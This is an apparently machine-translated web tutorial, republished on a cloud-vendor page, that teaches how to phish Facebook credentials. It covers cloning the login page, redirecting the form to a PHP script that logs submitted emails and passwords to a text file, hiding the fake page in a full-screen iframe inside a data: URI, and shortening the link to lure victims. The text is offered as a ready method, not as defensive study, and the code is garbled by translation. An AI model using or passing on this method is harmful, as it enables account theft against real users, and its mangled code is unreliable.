How to Use iframe URI for phishing

Source: Internet
Author: User

This document describes how to perform a phishing attack by stealing a facebook login account. The process is very simple. It mainly involves two steps to create a phishing page, which is similar to the phishing page of The phishing URI and other websites. You can check the method when you are new to phishing.

I. Create a phishing page

For example, if you want to steal a facebook's login account, a total of three files are included: index.html, login.php, and password.txt.

Step 1: Create an index.html login page

First, open the https://www.facebook.com page and copy the source code to the index.html file.

Edit the index.html file and find

<form id="login_form" action="https://www.facebook.com/login.php?login_attempt=1" method="post" onsubmit="return window.Event &amp;&amp; 
Event.__inlineSubmit &amp;&amp; Event.__inlineSubmit(this,event)">

Change the value of action

action=login.php?"https://www.facebook.com/login.php?login_attempt=1"

(Login. php is used to steal the login account password)

Put index.html in the web directory. My files are stored in the/Library/WebServer/Documents/facebook directory)

Step 2: Create a script for stealing facebook accounts and passwords login. php

<? Phpheader ('location: https://www.facebook.com '); // jump to the real facebook page $ handle = fopen ("password.txt", ""); // write the postdata submitted on the counterfeit page to the foreach ($ _ POST as $ variable =>$ value) {fwrite ($ handle, $ variable); fwrite ($ handle, "= "); fwrite ($ handle, $ value); fwrite ($ handle, "\ r \ n");} fwrite ($ handle, "===================\ r \ n"); fclose ($ handle); exit;?>

Step 3: Create the password.txt file that receives postdata

dani-2:facebook leedani$ pwd /Library/WebServer/Documents/facebookdani-2:facebook leedani$ sudo touch password.txt  dani-2:facebook leedani$ sudo chmod a+w password.txt  

Step 4: Test

Log on to http: // localhost/facebook/

Enter the email and password, and click Login

Upload password.txt File

dani-2:facebook leedani$ cat password.txt  

Check that the email and pass fields are the login accounts and passwords of facebook.

Ii. Create a phishing URI

Generally, Phishing uses iframe to cover the original page with a phishing page. The next operation is to generate a Data: URI with this function and convert the URI to a short address.

Step 1: Generate attack code

Src is the address where you store phishing pages.

<style> body {margin:0; overflow:hidden;}</style><iframe src="http://localhost/facebook/" height="100%" width="100%" border="no" frameBorder="0" scrolling="auto">iFrame Failed</iframe

Step 2: Convert the attack code to data: URI

Log on to http://dopiaza.org/tools/datauri/index.php and paste the authorization code,

Corresponding data: URI

Data: text/plain; charset = UTF-8; base64, encoding +

Change data: text/plain in data: URI to data: text/html.

Data: text/html; charset = UTF-8; base64, encoding +

After accessing the modified Data URI, we can see that

Click the facebook icon or the url below (Browse facebook.com) To Go To The facebook fake logon page http: // localhost/facebook/we created in step 1 /.

Step 3: generate data: short address corresponding to URI

Obviously, this URI is too long and may cause suspicion. in the real environment, we can convert short URLs first, such as http://tinyurl.com/just remove this service.

Finally, the victim is tempted to click the URI that will connect to the phishing page to steal the account and password.

Reference: http://www.hackingarticles.in/hack-email-or-facebook-password-using-iframe-uri-phishing/

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.